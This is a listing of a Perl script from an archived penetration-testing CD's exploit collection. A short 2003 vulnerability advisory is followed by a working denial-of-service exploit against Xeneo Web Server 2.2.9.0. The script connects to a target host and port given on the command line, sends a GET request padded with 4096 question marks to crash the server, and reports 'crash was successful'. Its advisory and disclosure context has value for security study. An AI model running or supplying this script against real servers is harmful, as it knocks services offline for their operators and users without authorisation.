home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / xeneo / sp-xeneo.pl < prev    next >
Text File  |  2005-02-12  |  3KB  |  104 lines

  1. ##!/usr/bin/perl
  2. #
  3. #
  4. #
  5. #SP Research Labs Advisory x03
  6. #-----------------------------
  7. #www.security-protocols.com
  8. #
  9. #Product - Xeneo Web Server 2.2.9.0
  10. #
  11. #Download it here:
  12. #http://www.northernsolutions.com/index.php?view=product&id=1
  13. #
  14. #Date Released - 04/21/2003
  15. #
  16. #Release Mode - Vendor was notified on 3/18/2003.  Sent a few emails but
  17. #never got any replies.  So here it goes.
  18. #
  19. #----------------------------
  20. #
  21. #Product Description from the vendor -
  22. #
  23. #Xeneo Web Server is designed to deliver high performance and
  24. #reliability. It can be easily extended and customized to host
  25. #everything from a personal web site to advanced web applications
  26. #that use ASP, PHP, ColdFusion, Perl, CGI and ISAPI.  Key Xeneo
  27. #Web Server features include: multiple domain support, integrated
  28. #Windows authentication, scripting interface, enhanced filter
  29. #support, ISAPI, CGI, ASP, SSL, intelligent file caching and more.
  30. #
  31. #-----------------------------
  32. #
  33. #Vulnerability Description -
  34. #
  35. #To exploit this vulnerability, simply do a GET / with 4096 ?'s or  more
  36. #will cause the web server to go down.  It is not exploitable at this
  37. #point.
  38. #
  39. #Tested on:
  40. #
  41. #Windows XP Pro SP1
  42. #Windows 2000 SP3
  43. #
  44. #
  45. # Xeneo Web Server DoS 
  46. #
  47. # Vulnerable systems:
  48. # Xeneo. Web Server 2.2.9.0
  49. # http://www.northernsolutions.com
  50. # Written by badpack3t <badpack3t@security-protocols.com>
  51. # For SP Research Labs
  52. # 04/21/2003
  53. # www.security-protocols.com
  54. # usage: 
  55. # perl sp-xeneo.pl <target> <port>
  56. #
  57. # big ups 2: c0nnie!!!! 143~!~!~!
  58.  
  59. use IO::Socket;
  60. use strict;
  61.  
  62. print ".:."x 20; print "\nXeneo Web Server 2.2.9.0 DoS, <badpack3t\@security-protocols.com>\n";
  63. print ".:."x 20; print "\n\n";
  64.  
  65. if( !defined( $ARGV[ 0 ] && $ARGV[ 1 ]))
  66. {
  67.    &usage;
  68. }
  69.  
  70. my $host     = $ARGV[ 0 ];
  71. my $def      = "?";
  72. my $num         = "4096";
  73. my $port     = $ARGV[ 1 ];
  74. my $urfuqed  = $def x $num;
  75.  
  76. my $tcpval   = getprotobyname( 'tcp' );
  77. my $serverIP = inet_aton( $host );
  78. my $serverAddr = sockaddr_in( $ARGV[ 1 ], $serverIP );
  79. my $protocol_name = "tcp";
  80.  
  81. my $iaddr    = inet_aton( $host )            || die ( "host was not found: $host" );
  82. my $paddr    = sockaddr_in( $port, $iaddr )    || die ( "you did something wrong stupid... exiting..." );
  83. my $proto    = getprotobyname( 'tcp' )         || die ( "cannot get protocol" );
  84. socket( SOCK, PF_INET, SOCK_STREAM, $proto )   || die ( "socket could not open: $host" );
  85. connect( SOCK, $paddr )                || die ( "cannot connect to: $host" );
  86.  
  87. my $submit   = "GET /$urfuqed HTTP/1.0\r\n\r\n";   
  88. send( SOCK,$submit,0 );
  89. close( SOCK );
  90.  
  91. sub usage 
  92. {
  93.    die( "\n\nUsage: perl $0 <target_host> <port>\n\n" );
  94. }
  95.  
  96. print "\n.:.:.:.:.:.:.:.:.:.:.:.";
  97. print "\ncrash was successful ~!\n";
  98. print "\.:.:.:.:.:.:.:.:.:.:.:.\n";
  99.  
  100.  
  101.